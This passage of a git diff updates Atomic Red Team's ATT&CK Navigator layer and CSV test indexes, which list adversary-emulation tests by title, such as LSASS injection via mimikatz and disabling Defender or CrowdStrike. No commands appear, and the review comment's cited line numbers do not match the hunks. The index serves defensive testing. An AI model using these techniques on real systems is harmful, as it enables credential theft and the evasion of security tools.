09","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{
"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"
techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1
037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,
"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","s
core":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.0
08","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{
"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"
techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 615157ed30..245c516dcb 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -28,6 +28,7 @@ privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/cront
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -51,9 +52,8 @@ privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
-privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
-privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
-privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
+privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
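Review bot: Moving "Process Injection via mavinject.exe" out of T1055 renumbers the two remaining T1055 rows (lines 1526-1527), so an existing reference such as T1055 test number 2 now resolves to "Remote Process Injection in LSASS via mimikatz" instead of "Shellcode execution via VBA"; the same renumbering appears in the defense-evasion hunk ending at the Regsvcs/Regasm rows. The GUIDs in column six are unchanged, so anything keyed on them is unaffected, and the mavinject test keeps its GUID 74496461-11a1-4982-b439-4d87a550d254 under T1055.001. If this index is generated from the atomic YAML, the fix belongs upstream, but the PR description should state the number shift so scheduled validation runs that select tests by number are reviewed rather than silently running a different test.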
@@ -364,6 +364,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
+defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
@@ -465,9 +466,8 @@ defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Fi
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
-defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
-defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
-defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
+defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -496,6 +496,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c
defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
+defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
@@ -736,6 +737,7 @@ execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
+execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 75f7c4bc62..2ca098310b 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -90,6 +90,7 @@ privilege-escalation,T1546.001,Change Default File Association,1,Change Default
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
@@ -104,9 +105,8 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
-privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
-privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
-privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
+privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
